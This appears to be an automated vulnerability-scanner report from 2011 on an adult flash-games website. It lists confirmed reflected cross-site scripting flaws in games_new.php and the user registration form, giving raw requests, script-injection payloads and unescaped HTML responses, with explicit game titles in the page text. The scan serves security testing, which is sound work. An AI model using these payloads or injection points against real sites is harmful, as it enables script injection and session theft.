width="157" height="112" ><span class = "def">Horny teacher</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Meet`N`Fuck Star Mission" title="Meet`N`Fuck Star Mission"><img src="imago/star.jpg" class = "game" width="157" height="112" ><span class = "def">Meet`N`Fuck Star Mission</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Maid" title="Horny Maid"><img src="imago/hornymaid.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Maid</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Olympic Adventures" title="Olympic Adventures"><img src="imago/olympic.jpg" class = "game" width="157" height="112" ><span class = "def">Olympic Adventures</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=SpiderMan Black Cat Felatio" title="SpiderMan Black Cat Felatio"><img src="imago/spiderman.jpg" class = "game" width="157" height="112" ><span class = "def">SpiderMan Black Cat Felatio</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=I love Laura" title="I love Laura"><img src="imago/illovelaura.jpg" class = "game" width="157" height="112" ><span class = "def">I love Laura</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High Tail Hall" title="High Tail Hall"><img src="imago/fur.jpg" class = "game" width="157" height="112" ><span class = "def">High Tail Hall</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3"><strong>PREVIOUS</strong></a> &nbsp; <a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >1</a> &nbsp; <strong>2</strong>&nbsp; <a href="?offset=40&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >3</a> &nbsp; <a href="?offset=60&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >4</a> &nbsp; <a href="?offset=80&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >5</a> &nbsp; <a href="?offset=100&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >6</a> &nbsp; <a href="?offset=120&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >7</a> &nbsp; <a href="?offset=140&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3" >8</a> &nbsp; <a href="?offset=40&id=\'\"--></style></script><script>netsparker(0x0001A4)</script>&category=3"><strong>NEXT</strong></a><p> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=&quest=", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=&quest=" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /games_new.php

/games_new.php CONFIRMED

http://www.lessonofpassion.com/games_new.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script..

Parameters

Parameter Type Value
offset GET 20
id GET 3
category GET '"--></style></script><script>alert(0x0001A6)</script>

Request

GET /games_new.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A6)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/games_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.lessonofpassion.com
Cookie: PHPSESSID=79225bf0badc75e8bf7a67f216794b63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 3223
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - \'\"--></style></script><script>netsparker(0x0001A6)</script> erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <br /><br /><FORM METHOD=POST action="user.php?type=login"><INPUT TYPE="hidden" NAME="type" VALUE="login"><B>Username</B> <INPUT TYPE="text" NAME="username" SIZE=14 class="form2">&nbsp;<B>Password</B> <INPUT TYPE="password" NAME="password" SIZE=14 class="form2">&nbsp;<input name="imageField" type="image" src="but_login.png" border="0" align = "absmiddle"></FORM><br />If you want to post comments and gain access to special features please <a href="user.php?type=register"><img src="but_register.png" border ="0"/></a> your account.</div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big">New games</div> <div id="glinks"> <p><a href="lop_games.php?mygame=Orihime Music" title="Orihime Music"><img src="imago/orihime.jpg" class = "game" width="157" height="112" ><span class = "def">Orihime Music</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Flame of the lust" title="Flame of the lust"><img src="imago/fotl.jpg" class = "game" width="157" height="112" ><span class = "def">Flame of the lust</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Detective Dick" title="Detective Dick"><img src="imago/dd.jpg" class = "game" width="157" height="112" ><span class = "def">Detective Dick</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Kikis Tittes" title="Kikis Tittes"><img src="imago/kiki.jpg" class = "game" width="157" height="112" ><span class = "def">Kikis Tittes</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Kim Possible Blowjob" title="Kim Possible Blowjob"><img src="imago/kimbj.jpg" class = "game" width="157" height="112" ><span class = "def">Kim Possible Blowjob</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Seductive RPG: Swim team" title="Seductive RPG: Swim team"><img src="imago/srpg-st.jpg" class = "game" width="157" height="112" ><span class = "def">Seductive RPG: Swim team</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Venona Project: Episode 1" title="Venona Project: Episode 1"><img src="imago/venona.jpg" class = "game" width="157" height="112" ><span class = "def">Venona Project: Episode 1</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Poker with Nicole" title="Poker with Nicole"><img src="imago/pokernikole.jpg" class = "game" width="157" height="112" ><span class = "def">Poker with Nicole</span><span class = "em">Logical</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Seductive RPG" title="Seductive RPG"><img src="imago/sedrpg.jpg" class = "game" width="157" height="112" ><span class = "def">Seductive RPG</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Jordan 500: HCC" title="Jordan 500: HCC"><img src="imago/j500.jpg" class = "game" width="157" height="112" ><span class = "def">Jordan 500: HCC</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Miami Holidays" title="Miami Holidays"><img src="imago/mhol.jpg" class = "game" width="157" height="112" ><span class = "def">Miami Holidays</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High school romance" title="High school romance"><img src="imago/highschoolromance.jpg" class = "game" width="157" height="112" ><span class = "def">High school romance</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Sweet neighbor" title="Sweet neighbor"><img src="imago/sweetneighbour.jpg" class = "game" width="157" height="112" ><span class = "def">Sweet neighbor</span><span class = "em">Tease</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny teacher" title="Horny teacher"><img src="imago/hornyteacher.jpg" class = "game" width="157" height="112" ><span class = "def">Horny teacher</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Meet`N`Fuck Star Mission" title="Meet`N`Fuck Star Mission"><img src="imago/star.jpg" class = "game" width="157" height="112" ><span class = "def">Meet`N`Fuck Star Mission</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Maid" title="Horny Maid"><img src="imago/hornymaid.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Maid</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Olympic Adventures" title="Olympic Adventures"><img src="imago/olympic.jpg" class = "game" width="157" height="112" ><span class = "def">Olympic Adventures</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=SpiderMan Black Cat Felatio" title="SpiderMan Black Cat Felatio"><img src="imago/spiderman.jpg" class = "game" width="157" height="112" ><span class = "def">SpiderMan Black Cat Felatio</span><span class = "em">Arcade</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=I love Laura" title="I love Laura"><img src="imago/illovelaura.jpg" class = "game" width="157" height="112" ><span class = "def">I love Laura</span><span class = "em">Dating</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High Tail Hall" title="High Tail Hall"><img src="imago/fur.jpg" class = "game" width="157" height="112" ><span class = "def">High Tail Hall</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>"><strong>PREVIOUS</strong></a> &nbsp; <a href="?offset=0&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >1</a> &nbsp; <strong>2</strong>&nbsp; <a href="?offset=40&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >3</a> &nbsp; <a href="?offset=60&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >4</a> &nbsp; <a href="?offset=80&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >5</a> &nbsp; <a href="?offset=100&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >6</a> &nbsp; <a href="?offset=120&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >7</a> &nbsp; <a href="?offset=140&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>" >8</a> &nbsp; <a href="?offset=40&id=3&category=\'\"--></style></script><script>netsparker(0x0001A6)</script>"><strong>NEXT</strong></a><p> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=&quest=", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=&quest=" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Parameters

Parameter Type Value
type GET register
stage POST adduser
usernamex POST '"--></style></script><script>alert(0x000203)</script>
passwordx POST 3
password2x POST 3
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=07a3ec0f17402878dc4cc311f0357beb
Content-Length: 177
Accept-Encoding: gzip, deflate

stage=adduser&usernamex='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000203)%3c%2fscript%3e&passwordx=3&password2x=3&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2358
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">\'\"--></style></script><script>netsparker(0x000203)</script>, welcome to Lesson of Passion CLUB!</span><br /><br />Your account with following data have been created.<br /><br />USERNAME: <strong>\'\"--></style></script><script>netsparker(0x000203)</script></strong><br />PASSWORD: <strong>3</strong><br /><br />Please LOGIN and start your adventure.<br /><br />We wish you best luck.<br />LOP TEAM<br /></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><span class = "absi"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","380","height","220","src", "comlink?username=Ronald Smith&quest=0", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","comlink?username=Ronald Smith&quest=0" , "menu", "false", "z-index","-1","wmode", "transparent"); //end AC code</script></span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register

Parameters

Parameter Type Value
type GET register
stage POST adduser
usernamex POST Ronald Smith
passwordx POST '"--></style></script><script>alert(0x000209)</script>
password2x POST 3
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=07a3ec0f17402878dc4cc311f0357beb
Content-Length: 188
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000209)%3c%2fscript%3e&password2x=3&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:00:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4658
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dgirlfriends.com/?t=110138,1,53,0" target = "_blank"><img src="lopsalesforce/vert_3dgf.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Your password is different that password confirmation<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x000209)</script>"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "3"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "netsparker@example.com"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option 